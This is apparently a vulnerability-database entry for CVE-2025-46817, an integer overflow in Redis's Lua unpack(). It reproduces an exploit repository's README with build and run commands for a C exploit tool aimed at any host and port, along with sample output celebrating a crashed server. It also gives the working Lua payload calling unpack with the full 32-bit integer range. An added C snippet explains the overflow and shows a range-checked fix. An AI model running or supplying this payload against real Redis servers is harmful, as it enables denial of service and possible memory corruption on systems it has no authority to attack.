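Related vulnerability
Title:
Redis input validation error vulnerability
(CVE-2025-46817)
Description: Redis is an open-source, log-structured key-value database from the US company Redis. It is written in ANSI C, supports networking, runs in memory with optional persistence, and provides APIs for many languages. Redis 8.2.1 and earlier contain an input validation error vulnerability: a specially crafted Lua script can cause an integer overflow, leading to remote code execution.
Introduction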
# CVE-2025-46817 Redis Integer Overflow Exploit



A lightweight C implementation of the CVE-2025-46817 exploit for Redis integer overflow vulnerability.
## 🚀 Features
- **Lightweight**: Single C file, no external dependencies beyond hiredis
- **Fast**: Native compilation for maximum performance
- **Colorful Output**: Beautiful terminal colors and icons
- **Crash Detection**: Automatically detects server crashes
- **Version Checking**: Identifies vulnerable Redis versions
- **Timeout Support**: Configurable connection timeouts
## 📋 Requirements
### Ubuntu/Debian
```bash
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
```
### CentOS/RHEL
```bash
sudo yum install gcc hiredis-devel
```
### macOS
```bash
brew install hiredis
```
## 🔧 Compilation
```bash
gcc -o exploit exploit.c -lhiredis
```
## 🎯 Usage
### Basic Usage
```bash
./exploit -H 127.0.0.1 -P 6379
```
### Remote Target
```bash
./exploit -H 192.168.1.100 -P 6379 -t 5
```
### Command Line Options
```
-H <host> Redis server host (required)
-P <port> Redis server port (required)
-t <timeout> Connection timeout in seconds (default: 10)
-h Show help message
```
## 📊 Example Output
```
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 Exploit Tool
Integer Overflow -> RCE Chain
Access -> https://pwnbuffer.org/
Author: Slayerkkk
Target: Redis <= 8.2.1
Type: Memory Corruption -> Code Execution
ℹ️ Testing connection to 127.0.0.1:6379...
✅ Connection successful
ℹ️ Redis version: 8.2.1
❌ VULNERABLE - Version <= 8.2.1
ℹ️ Testing Lua scripting...
✅ Lua enabled (1+1=2)
🚀 STARTING EXPLOITATION
==================================================
💀 Executing exploit payload...
Payload: Integer overflow via unpack()
💥 SERVER CRASHED - Connection lost!
📊 EXPLOITATION RESULT
==============================
💥 Status: crashed (2.34s)
💀 EXPLOITATION SUCCESSFUL - Server crashed!
CVE-2025-46817 vulnerability confirmed
```
## 🛡️ Affected Versions
- Redis <= 8.2.1
- Redis <= 8.0.3
- Redis <= 7.4.5
- Redis <= 7.2.10
- Redis <= 6.2.19
## 🔍 Technical Details
### Vulnerability
The exploit targets an integer overflow in Redis's Lua `unpack()` function implementation (`luaB_unpack`). When called with specific parameters, the signed integer arithmetic overflows, causing Redis to attempt materializing an enormous number of return values.
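
The count arithmetic described above, shown beside a range-checked form. This is an added illustration, not code from Redis, Lua, or this repository. It assumes a 32-bit `int` and that the number of results is computed as `e - i + 1`; the function names are hypothetical.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

_Static_assert(sizeof(int) == 4, "model assumes 32-bit int");

/* True size of the inclusive range [i, e], in 64 bits so it cannot overflow. */
static int64_t count_true(int i, int e) {
    return i > e ? 0 : (int64_t)e - (int64_t)i + 1;
}

/* What a 32-bit `e - i + 1` yields on two's-complement wraparound.
 * Signed overflow is undefined behaviour in C, so the wrap is modelled with
 * unsigned arithmetic to keep this demo itself well defined. */
static int32_t count_wrapped(int i, int e) {
    uint32_t w = (uint32_t)e - (uint32_t)i + 1u;
    return (int32_t)w; /* implementation-defined; wraps on gcc and clang */
}

/* Hardened form: 0 and *out set when the count fits in int, -1 otherwise. */
static int count_checked(int i, int e, int *out) {
    if (i > e) { *out = 0; return 0; }
    unsigned int span = (unsigned int)e - (unsigned int)i; /* count - 1 */
    if (span >= (unsigned int)INT_MAX) return -1;          /* count > INT_MAX */
    *out = (int)(span + 1u);
    return 0;
}

int main(void) {
    /* Constructed cases: a normal call, then bounds at the int limits. */
    const int cases[][2] = { {1, 3}, {0, INT_MAX}, {INT_MIN, INT_MAX} };
    for (size_t k = 0; k < sizeof cases / sizeof cases[0]; k++) {
        int i = cases[k][0], e = cases[k][1], n = 0;
        int rc = count_checked(i, e, &n);
        printf("i=%d e=%d true=%lld wrapped=%d checked=%s\n", i, e,
               (long long)count_true(i, e), (int)count_wrapped(i, e),
               rc == 0 ? "ok" : "rejected");
    }
    return 0;
}
```

For the full `int` range the true count is 2^32, which no 32-bit signed count can represent, so any check made on the wrapped value is meaningless; the unsigned-span comparison rejects the range before a count is ever formed.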
### Exploit Payload
```lua
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
```
### Impact
- **Server Crash**: Immediate denial of service
- **Memory Corruption**: Heap/stack corruption
- **Potential RCE**: Memory corruption could lead to code execution
## 🎯 Detection Results
The tool reports one of these statuses:
- ✅ **survived**: Server handled the payload (likely patched)
- 💥 **crashed**: Server crashed (vulnerable)
- ⚠️ **timeout**: Server hung (likely vulnerable)
- ❌ **error**: Other error occurred
## 🙏 Credits
**Author**: Slayerkkk
**Website**: https://pwnbuffer.org
File snapshot
[4.0K] /data/pocs/7a8b22f1ba5e633aa7eed7e5905970d233acf8f3
├── [ 12K] exploit.c
└── [4.7K] README.md
0 directories, 2 files